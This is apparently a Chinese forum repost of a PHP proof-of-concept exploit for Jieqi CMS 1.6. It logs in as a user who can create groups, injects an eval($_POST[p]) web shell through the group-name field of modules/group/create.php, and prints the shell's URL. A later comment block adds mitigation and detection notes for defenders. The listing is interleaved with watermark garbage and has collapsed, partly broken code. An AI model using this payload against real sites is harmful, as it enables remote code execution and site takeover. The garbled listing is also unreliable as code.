杰奇网站管理系统(简称 JIEQI CMS,中国国家版权局著作权登记号:2006SR03382)是一套模块化的网站架设系统,具备简单灵活、性能卓越、安全可靠等特性。我们为大家提供了目前最流行的杰奇小说连载系统、杰奇原创漫画系统及数字出版解决方案,并提供各类网站定制服务。
" G6 \/ C5 I2 s! l X$ [8 b S
5 |" i; Y) {2 c: E6 I' S; c- Z6 C: I ; k& O. d& N# n0 U; h
该系统存在多个远程安全漏洞,今天报告的这个是1.6版本的一个远程代码执行漏洞,应该有2年多历史了。
需要有一个能创建圈子的用户。
( o$ s! _% Q4 x @<?php
// Forum repost of a proof-of-concept for a PHP code injection in Jieqi CMS 1.6
// (group creation). As posted, the listing is interleaved with anti-copy
// watermark noise and several statements were collapsed onto single lines, so
// it is not runnable as-is; it is annotated here only so a defender can see
// which endpoint is abused and what to look for. Nothing below this comment
// has been altered.
//
// What the code does, as far as the visible lines show:
//   1. POSTs the supplied username/password to <host>/<path>/login.php and
//      keeps the session cookie in cookie.txt (CURLOPT_COOKIEJAR, later read
//      back with CURLOPT_COOKIEFILE).
//   2. POSTs a hand-built multipart/form-data body (fields gname, gcatid,
//      gaudit, gbrief) to modules/group/create.php; the gname value is not a
//      name but a PHP fragment that closes a quoted string and calls eval().
//   3. Matches "g=<digits>" in the response and prints the URL of
//      files/group/userdir/0/<id>/info.php, where the injected fragment is
//      expected to have ended up.
//
// Defender notes (the listing implies the group name is written unescaped into
// a .php file under files/group/userdir -- confirm against the CMS source):
//   - Mitigation: validate the group name server-side (length, character set)
//     and never persist user-supplied text into executable files; deny PHP
//     execution under files/group/userdir and serve it as static content.
//   - Detection: multipart POSTs to modules/group/create.php whose gname field
//     contains quotes, "eval(" or "$_POST"; new or modified info.php files
//     under files/group/userdir/*/. The boundary "23281168279961" and the
//     "flyh4t" marker are specific to this script and should not be the only
//     indicator relied on.
//
// Review notes on the listing itself:
//   - On the login error path, curl_error($ch) reads an undefined $ch; the
//     handle in scope is $curl1, so the printed error text would be empty.
//   - The Chinese comment "//$rs就是返回的内容" means "$rs is the returned
//     content"; the variable that actually holds the response is $resp.
//   - error_reporting(7) hides notices; "www.2cto.com" is a site watermark
//     that was glued onto the end of a code line, not part of the script.
/ z; n) ~* N1 I$ J! v9 ~+ W7 U - S. D C2 y# F5 M. F0 V
print_r('- ]2 V" i- T4 c4 r
+---------------------------------------------------------------------------+/ y; X* r( z z1 A2 j+ a& ]: N
Jieqi CMS V1.6 PHP Code Injection Exploit. C8 T& Q* m6 ~$ h2 R7 o' g
by flyh4t
& r; \: j% q8 v: j2 Pmail: phpsec at hotmail dot com" ^+ N" @) U9 G
team: http://www.wolvez.org
5 S& h* Y$ O/ t# L" X2 o+---------------------------------------------------------------------------+" u# m5 |# |5 {* a% U; y
'); /**& d! T! p+ y1 l6 ]' n' E# ?4 s
* works regardless of php.ini settings" h( h( g: e7 Z( H
*/ if ($argc < 5) { print_r('
$ n% G9 Q. t" a) `* q( n7 T+ d; z+---------------------------------------------------------------------------+
# d& M; f4 _) s' S% {1 |) l! m) mUsage: php '.$argv[0].' host path username6 W& ~2 w2 Z( B
host: target server (ip/hostname)
. h9 U4 j& e+ I9 k, Q7 y! ypath: path to jieqicms
4 [: u' }3 J1 ~( Z# H6 A+ guasename: a username who can create group
( e$ V' i* b3 r' x$ Z" lExample:: ~; S9 k5 Z5 `8 x( p; b$ ]
php '.$argv[0].' localhost /jieqicmsv1.6/ vipuser1 password
; o. ~. X. ?0 c+---------------------------------------------------------------------------+5 d: {2 d* \6 p$ [' x# v0 k
'); exit; } error_reporting(7); ini_set('max_execution_time', 0); $host = $argv[1]; $path = $argv[2]; $username = $argv[3]; $password = $argv[4]; /*get cookie*/ $cookie_jar_index = 'cookie.txt'; $url1 = "http://$host/$path/login.php"; $params = "password=$password&username=$username&usecookie=86400&submit=%26%23160%3B%B5%C7%26%23160%3B%26%23160%3B%C2%BC%26%23160%3B&action=login&jumpreferer=1"; $curl1 = curl_init(); curl_setopt($curl1, CURLOPT_URL, $url1); curl_setopt($curl1, CURLOPT_COOKIEJAR, $cookie_jar_index); curl_setopt($curl1, CURLOPT_POST, 1); curl_setopt($curl1, CURLOPT_POSTFIELDS, $params); ob_start(); $data1 = curl_exec($curl1); if ($data1 === FALSE) { echo "cURL Error: " . curl_error($ch); exit('exploit failed'); } curl_close($curl1); ob_clean(); /*get shell*/ $params ='-----------------------------23281168279961
' G7 }# z( ~$ }) e0 CContent-Disposition: form-data; name="gname"9 f4 z! ~5 F6 L( J9 R3 i. T
0 c0 B- l. x4 I'; $params .="';"; $params .='eval($_POST[p]);//flyh4t/ Y8 V |5 \; z
-----------------------------232811682799610 b" U; Y7 X, J" t! w- F' w7 {
Content-Disposition: form-data; name="gcatid"' f; V+ [' T# u5 I
Y+ y+ {& }3 h1
) E A, E& M1 r% r6 r8 ^; V4 @9 J& s$ U( L-----------------------------23281168279961* d) z5 |4 u v. c
Content-Disposition: form-data; name="gaudit"& z* i6 N/ a1 y" T1 {
7 D1 N( M F$ `! J0 a1
~! @' p$ |8 D% d# V6 b-----------------------------23281168279961
1 b" R/ q W: M, Z7 DContent-Disposition: form-data; name="gbrief") p$ B3 H6 ]: O% L& B1 a' F
& K1 l. V" R ]1
M0 W k$ v$ w C1 a-----------------------------23281168279961--1 L! n3 H" c4 Z4 C4 n8 V9 y% `
'; $url2 = "http://$host/$path/modules/group/create.php"; $curl2 = curl_init(); $header =array( 'Content-Type: multipart/form-data; boundary=---------------------------23281168279961' ); curl_setopt($curl2, CURLOPT_URL, $url2); curl_setopt($curl2, CURLOPT_HTTPHEADER, $header); curl_setopt($curl2, CURLOPT_COOKIEFILE, $cookie_jar_index); curl_setopt($curl2, CURLOPT_POST, 1); curl_setopt($curl2, CURLOPT_POSTFIELDS, $params); ob_start(); curl_exec($curl2); curl_close($curl2); $resp = ob_get_contents(); //$rs就是返回的内容 ob_clean(); www.2cto.com
; A+ _# A& w& G
: N, s' E* Q3 O- `preg_match('/g=([0-9]{1,4})/', $resp, $shell); //print_r($shell); //print_r($resp); $url = "http://$host/$path/files/group/userdir/0/$shell[1]/info.php"; echo "view you shell here(password:p)\r\n" ; echo $url; |